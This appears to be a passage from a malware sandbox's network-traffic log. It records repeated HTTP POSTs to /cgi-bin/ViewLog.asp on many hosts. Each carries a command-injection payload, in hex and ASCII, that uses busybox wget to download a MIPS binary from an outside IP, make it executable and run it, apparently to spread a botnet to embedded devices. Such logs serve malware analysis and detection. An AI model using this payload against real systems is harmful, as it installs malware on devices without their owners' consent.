                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.292813063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              119192.168.2.144227694.250.242.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.961368084 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.159648895 CET148INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:32 GMT
                                              Connection: Close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              120192.168.2.145356485.105.86.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:32.001277924 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              121192.168.2.143302885.105.252.2218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:32.040466070 CET475INHTTP/1.1 408 Request Timeout
                                              Server: micro_httpd
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Date: Thu, 23 Nov 2023 07:15:31 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              122192.168.2.143280662.202.26.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:32.752115965 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.345129013 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.534040928 CET313INHTTP/1.1 501 Not Implemented
                                              Connection: Keep-Alive
                                              Content-Length: 121
                                              Date: Thu, 23 Nov 2023 03:55:16 GMT
                                              Expires: 0
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              123192.168.2.144881895.217.193.1248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:32.752218962 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.355137110 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.551157951 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              124192.168.2.143401294.121.188.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:32.774691105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              125192.168.2.145196831.200.51.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:32.783085108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              126192.168.2.145732831.43.30.58080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:33.218029022 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.434946060 CET148INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:33 GMT
                                              Connection: Close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              127192.168.2.143845431.136.8.948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.168248892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.767637968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.919595003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.319554090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.927383900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.142967939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574161053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.436616898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              128192.168.2.143565031.136.105.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.169497967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.767637968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.919595003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.319552898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.927383900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
